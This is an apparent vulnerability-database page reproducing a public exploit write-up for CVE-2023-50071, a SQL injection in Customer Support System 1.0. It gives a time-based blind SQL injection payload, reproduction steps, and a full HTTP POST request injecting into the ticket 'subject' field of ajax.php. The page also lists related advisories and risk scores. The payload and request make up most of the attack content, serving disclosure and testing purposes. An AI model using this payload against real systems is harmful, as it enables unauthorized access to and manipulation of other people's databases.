Customer Support System 1.0 SQL Injection

🗓️ 06 Mar 2024 00:00:00Reported by Geraldo AlcantaraType

packetstorm🔗 packetstormsecurity.com👁 453 Views

Customer Support System 1.0 SQL Injection via /customer_support/ajax.php?action=save_ticke

Reporter	Title	Published	Views	Family All 15
0day.today	Customer Support System 1.0 - Multiple SQL injection Vulnerability	6 Mar 202400:00	–	zdt
0day.today	Customer Support System 1.0 SQL Injection Vulnerability	6 Mar 202400:00	–	zdt
GithubExploit	Exploit for SQL Injection in Customer_Support_System_Project Customer_Support_System	16 Dec 202323:06	–	githubexploit
ATTACKERKB	CVE-2023-50071	29 Dec 202322:15	–	attackerkb
Circl	CVE-2023-50071	17 Dec 202307:25	–	circl
CNNVD	Customer Support System Security Breach	29 Dec 202300:00	–	cnnvd
CVE	CVE-2023-50071	29 Dec 202300:00	–	cve
Cvelist	CVE-2023-50071	29 Dec 202300:00	–	cvelist
Exploit DB	CVE-2023-50071 - Multiple SQL Injection	6 Mar 202400:00	–	exploitdb
NVD	CVE-2023-50071	29 Dec 202322:15	–	nvd

`# Exploit Title: Customer Support System 1.0 - Multiple SQL injection  
vulnerabilities  
# Date: 15/12/2023  
# Exploit Author: Geraldo Alcantara  
# Vendor Homepage:  
https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html  
# Software Link:  
https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code  
# Version: 1.0  
# Tested on: Windows  
# CVE : CVE-2023-50071  
*Description*: Multiple SQL injection vulnerabilities in  
/customer_support/ajax.php?action=save_ticket in Customer Support  
System 1.0 allow authenticated attackers to execute arbitrary SQL  
commands via department_id, customer_id and subject.*Payload*:  
'+(select*from(select(sleep(20)))a)+'  
*Steps to reproduce*:  
  
1- Log in to the application.  
  
2- Navigate to the page /customer_support/index.php?page=new_ticket.  
  
3- Create a new ticket and insert a malicious payload into one of the  
following parameters: department_id, customer_id, or subject.  
*Request:*  
POST /customer_support/ajax.php?action=save_ticket HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)  
Gecko/20100101 Firefox/120.0  
Accept: */*  
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate, br  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------81419250823331111993422505835  
Content-Length: 853  
Origin: http://192.168.68.148  
Connection: close  
Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket  
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko;  
sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq;  
PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l  
  
-----------------------------81419250823331111993422505835  
Content-Disposition: form-data; name="id"  
  
  
-----------------------------81419250823331111993422505835  
Content-Disposition: form-data; name="subject"  
  
teste'+(select*from(select(sleep(5)))a)+'  
-----------------------------81419250823331111993422505835  
Content-Disposition: form-data; name="customer_id"  
  
3  
-----------------------------81419250823331111993422505835  
Content-Disposition: form-data; name="department_id"  
  
4  
-----------------------------81419250823331111993422505835  
Content-Disposition: form-data; name="description"  
  
<p>Blahs<br></p>  
-----------------------------81419250823331111993422505835  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------81419250823331111993422505835--  
  
`

06 Mar 2024 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.18.8

EPSS0.13754

SSVC